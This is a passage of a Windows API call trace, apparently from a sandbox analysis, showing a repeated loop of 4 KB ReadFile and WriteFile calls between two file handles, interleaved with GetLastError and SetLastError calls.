[0076.772] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.772] GetLastError () returned 0x0 [0076.772] SetLastError (dwErrCode=0x0) [0076.772] GetLastError () returned 0x0 [0076.772] SetLastError (dwErrCode=0x0) [0076.772] GetLastError () returned 0x0 [0076.772] SetLastError (dwErrCode=0x0) [0076.772] GetLastError () returned 0x0 [0076.772] SetLastError (dwErrCode=0x0) [0076.772] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.772] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.773] GetLastError () returned 0x0 [0076.773] SetLastError (dwErrCode=0x0) [0076.773] GetLastError () returned 0x0 [0076.773] SetLastError (dwErrCode=0x0) [0076.773] GetLastError () returned 0x0 [0076.773] SetLastError (dwErrCode=0x0) [0076.773] GetLastError () returned 0x0 [0076.773] SetLastError (dwErrCode=0x0) [0076.773] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.773] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.773] GetLastError () returned 0x0 [0076.773] SetLastError (dwErrCode=0x0) [0076.773] GetLastError () returned 0x0 [0076.773] SetLastError (dwErrCode=0x0) [0076.773] GetLastError () returned 0x0 [0076.773] SetLastError (dwErrCode=0x0) [0076.773] GetLastError () returned 0x0 [0076.773] SetLastError (dwErrCode=0x0) [0076.773] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.773] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.774] GetLastError () returned 0x0 [0076.774] SetLastError (dwErrCode=0x0) [0076.774] GetLastError () returned 0x0 [0076.774] SetLastError (dwErrCode=0x0) [0076.774] GetLastError () returned 0x0 [0076.774] SetLastError (dwErrCode=0x0) [0076.774] GetLastError () returned 0x0 [0076.774] SetLastError (dwErrCode=0x0) [0076.774] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.774] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.774] GetLastError () returned 0x0 [0076.774] SetLastError (dwErrCode=0x0) [0076.774] GetLastError () returned 0x0 [0076.774] SetLastError (dwErrCode=0x0) [0076.774] GetLastError () returned 0x0 [0076.774] SetLastError (dwErrCode=0x0) [0076.774] GetLastError () returned 0x0 [0076.774] SetLastError (dwErrCode=0x0) [0076.774] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.774] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.034] GetLastError () returned 0x0 [0077.034] SetLastError (dwErrCode=0x0) [0077.034] GetLastError () returned 0x0 [0077.034] SetLastError (dwErrCode=0x0) [0077.034] GetLastError () returned 0x0 [0077.034] SetLastError (dwErrCode=0x0) [0077.034] GetLastError () returned 0x0 [0077.034] SetLastError (dwErrCode=0x0) [0077.034] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.034] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.034] GetLastError () returned 0x0 [0077.034] SetLastError (dwErrCode=0x0) [0077.034] GetLastError () returned 0x0 [0077.034] SetLastError (dwErrCode=0x0) [0077.034] GetLastError () returned 0x0 [0077.034] SetLastError (dwErrCode=0x0) [0077.034] GetLastError () returned 0x0 [0077.034] SetLastError (dwErrCode=0x0) [0077.034] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.035] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.035] GetLastError () returned 0x0 [0077.035] SetLastError (dwErrCode=0x0) [0077.035] GetLastError () returned 0x0 [0077.035] SetLastError (dwErrCode=0x0) [0077.035] GetLastError () returned 0x0 [0077.035] SetLastError (dwErrCode=0x0) [0077.035] GetLastError () returned 0x0 [0077.035] SetLastError (dwErrCode=0x0) [0077.035] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.035] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.035] GetLastError () returned 0x0 [0077.035] SetLastError (dwErrCode=0x0) [0077.035] GetLastError () returned 0x0 [0077.035] SetLastError (dwErrCode=0x0) [0077.035] GetLastError () returned 0x0 [0077.035] SetLastError (dwErrCode=0x0) [0077.035] GetLastError () returned 0x0 [0077.036] SetLastError (dwErrCode=0x0) [0077.036] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.036] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.036] GetLastError () returned 0x0 [0077.036] SetLastError (dwErrCode=0x0) [0077.036] GetLastError () returned 0x0 [0077.036] SetLastError (dwErrCode=0x0) [0077.036] GetLastError () returned 0x0 [0077.036] SetLastError (dwErrCode=0x0) [0077.036] GetLastError () returned 0x0 [0077.036] SetLastError (dwErrCode=0x0) [0077.036] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.036] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.037] GetLastError () returned 0x0 [0077.037] SetLastError (dwErrCode=0x0) [0077.037] GetLastError () returned 0x0 [0077.037] SetLastError (dwErrCode=0x0) [0077.037] GetLastError () returned 0x0 [0077.037] SetLastError (dwErrCode=0x0) [0077.037] GetLastError () returned 0x0 [0077.037] SetLastError (dwErrCode=0x0) [0077.037] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.037] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.037] GetLastError () returned 0x0 [0077.037] SetLastError (dwErrCode=0x0) [0077.037] GetLastError () returned 0x0 [0077.037] SetLastError (dwErrCode=0x0) [0077.037] GetLastError () returned 0x0 [0077.037] SetLastError (dwErrCode=0x0) [0077.037] GetLastError () returned 0x0 [0077.037] SetLastError (dwErrCode=0x0) [0077.037] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.037] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.038] GetLastError () returned 0x0 [0077.038] SetLastError (dwErrCode=0x0) [0077.038] GetLastError () returned 0x0 [0077.038] SetLastError (dwErrCode=0x0) [0077.038] GetLastError () returned 0x0 [0077.038] SetLastError (dwErrCode=0x0) [0077.038] GetLastError () returned 0x0 [0077.038] SetLastError (dwErrCode=0x0) [0077.038] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.038] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.038] GetLastError () returned 0x0 [0077.038] SetLastError (dwErrCode=0x0) [0077.038] GetLastError () returned 0x0 [0077.038] SetLastError (dwErrCode=0x0) [0077.038] GetLastError () returned 0x0 [0077.038] SetLastError (dwErrCode=0x0) [0077.038] GetLastError () returned 0x0 [0077.039] SetLastError (dwErrCode=0x0) [0077.039] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.039] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.039] GetLastError () returned 0x0 [0077.039] SetLastError (dwErrCode=0x0) [0077.039] GetLastError () returned 0x0 [0077.039] SetLastError (dwErrCode=0x0) [0077.039] GetLastError () returned 0x0 [0077.039] SetLastError (dwErrCode=0x0) [0077.039] GetLastError () returned 0x0 [0077.039] SetLastError (dwErrCode=0x0) [0077.039] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.039] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.039] GetLastError () returned 0x0 [0077.039] SetLastError (dwErrCode=0x0) [0077.039] GetLastError () returned 0x0 [0077.039] SetLastError (dwErrCode=0x0) [0077.039] GetLastError () returned 0x0 [0077.040] SetLastError (dwErrCode=0x0) [0077.040] GetLastError () returned 0x0 [0077.040] SetLastError (dwErrCode=0x0) [0077.040] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.040] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.040] GetLastError () returned 0x0 [0077.040] SetLastError (dwErrCode=0x0) [0077.040] GetLastError () returned 0x0 [0077.040] SetLastError (dwErrCode=0x0) [0077.040] GetLastError () returned 0x0 [0077.040] SetLastError (dwErrCode=0x0) [0077.040] GetLastError () returned 0x0 [0077.040] SetLastError (dwErrCode=0x0) [0077.040] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.041] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.041] GetLastError () returned 0x0 [0077.041] SetLastError (dwErrCode=0x0) [0077.041] GetLastError () returned 0x0 [0077.041] SetLastError (dwErrCode=0x0) [0077.041] GetLastError () returned 0x0 [0077.041] SetLastError (dwErrCode=0x0) [0077.041] GetLastError () returned 0x0 [0077.041] SetLastError (dwErrCode=0x0) [0077.041] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.041] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.042] GetLastError () returned 0x0 [0077.042] SetLastError (dwErrCode=0x0) [0077.042] GetLastError () returned 0x0 [0077.042] SetLastError (dwErrCode=0x0) [0077.042] GetLastError () returned 0x0 [0077.042] SetLastError (dwErrCode=0x0) [0077.042] GetLastError () returned 0x0 [0077.042] SetLastError (dwErrCode=0x0) [0077.042] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.042] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.042] GetLastError () returned 0x0 [0077.042] SetLastError (dwErrCode=0x0) [0077.042] GetLastError () returned 0x0 [0077.042] SetLastError (dwErrCode=0x0) [0077.042] GetLastError () returned 0x0 [0077.042] SetLastError (dwErrCode=0x0) [0077.042] GetLastError () returned 0x0 [0077.042] SetLastError (dwErrCode=0x0) [0077.042] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.042] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.043] GetLastError () returned 0x0 [0077.043] SetLastError (dwErrCode=0x0) [0077.043] GetLastError () returned 0x0 [0077.043] SetLastError (dwErrCode=0x0) [0077.043] GetLastError () returned 0x0 [0077.043] SetLastError (dwErrCode=0x0) [0077.043] GetLastError () returned 0x0 [0077.043] SetLastError (dwErrCode=0x0) [0077.043] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.043] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.043] GetLastError () returned 0x0 [0077.043] SetLastError (dwErrCode=0x0) [0077.043] GetLastError () returned 0x0 [0077.043] SetLastError (dwErrCode=0x0) [0077.043] GetLastError () returned 0x0 [0077.043] SetLastError (dwErrCode=0x0) [0077.043] GetLastError () returned 0x0 [0077.043] SetLastError (dwErrCode=0x0) [0077.043] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.044] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.045] GetLastError () returned 0x0 [0077.045] SetLastError (dwErrCode=0x0) [0077.045] GetLastError () returned 0x0 [0077.045] SetLastError (dwErrCode=0x0) [0077.045] GetLastError () returned 0x0 [0077.045] SetLastError (dwErrCode=0x0) [0077.045] GetLastError () returned 0x0 [0077.045] SetLastError (dwErrCode=0x0) [0077.045] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.045] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.045] GetLastError () returned 0x0 [0077.045] SetLastError (dwErrCode=0x0) [0077.045] GetLastError () returned 0x0 [0077.045] SetLastError (dwErrCode=0x0) [0077.045] GetLastError () returned 0x0 [0077.045] SetLastError (dwErrCode=0x0) [0077.045] GetLastError () returned 0x0 [0077.045] SetLastError (dwErrCode=0x0) [0077.045] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.045] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.046] GetLastError () returned 0x0 [0077.046] SetLastError (dwErrCode=0x0) [0077.046] GetLastError () returned 0x0 [0077.046] SetLastError (dwErrCode=0x0) [0077.046] GetLastError () returned 0x0 [0077.046] SetLastError (dwErrCode=0x0) [0077.046] GetLastError () returned 0x0 [0077.046] SetLastError (dwErrCode=0x0) [0077.046] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.046] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.046] GetLastError () returned 0x0 [0077.046] SetLastError (dwErrCode=0x0) [0077.046] GetLastError () returned 0x0 [0077.046] SetLastError (dwErrCode=0x0) [0077.046] GetLastError () returned 0x0 [0077.046] SetLastError (dwErrCode=0x0) [0077.046] GetLastError () returned 0x0 [0077.046] SetLastError (dwErrCode=0x0) [0077.046] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.047] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.047] GetLastError () returned 0x0 [0077.047] SetLastError (dwErrCode=0x0) [0077.047] GetLastError () returned 0x0 [0077.047] SetLastError (dwErrCode=0x0) [0077.047] GetLastError () returned 0x0 [0077.047] SetLastError (dwErrCode=0x0) [0077.047] GetLastError () returned 0x0 [0077.047] SetLastError (dwErrCode=0x0) [0077.047] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.047] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.047] GetLastError () returned 0x0 [0077.047] SetLastError (dwErrCode=0x0) [0077.047] GetLastError () returned 0x0 [0077.047] SetLastError (dwErrCode=0x0) [0077.047] GetLastError () returned 0x0 [0077.047] SetLastError (dwErrCode=0x0) [0077.047] GetLastError () returned 0x0 [0077.047] SetLastError (dwErrCode=0x0) [0077.048] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.048] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.048] GetLastError () returned 0x0 [0077.048] SetLastError (dwErrCode=0x0) [0077.048] GetLastError () returned 0x0 [0077.048] SetLastError (dwErrCode=0x0) [0077.048] GetLastError () returned 0x0 [0077.048] SetLastError (dwErrCode=0x0) [0077.048] GetLastError () returned 0x0 [0077.048] SetLastError (dwErrCode=0x0) [0077.048] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.048] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.048] GetLastError () returned 0x0 [0077.048] SetLastError (dwErrCode=0x0) [0077.048] GetLastError () returned 0x0 [0077.048] SetLastError (dwErrCode=0x0) [0077.049] GetLastError () returned 0x0 [0077.049] SetLastError (dwErrCode=0x0) [0077.049] GetLastError () returned 0x0 [0077.049] SetLastError (dwErrCode=0x0) [0077.049] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.049] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.049] GetLastError () returned 0x0 [0077.049] SetLastError (dwErrCode=0x0) [0077.049] GetLastError () returned 0x0 [0077.049] SetLastError (dwErrCode=0x0) [0077.049] GetLastError () returned 0x0 [0077.049] SetLastError (dwErrCode=0x0) [0077.049] GetLastError () returned 0x0 [0077.049] SetLastError (dwErrCode=0x0) [0077.049] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.049] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.049] GetLastError () returned 0x0 [0077.050] SetLastError (dwErrCode=0x0) [0077.050] GetLastError () returned 0x0 [0077.050] SetLastError (dwErrCode=0x0) [0077.050] GetLastError () returned 0x0 [0077.050] SetLastError (dwErrCode=0x0) [0077.050] GetLastError () returned 0x0 [0077.050] SetLastError (dwErrCode=0x0) [0077.050] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.050] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, 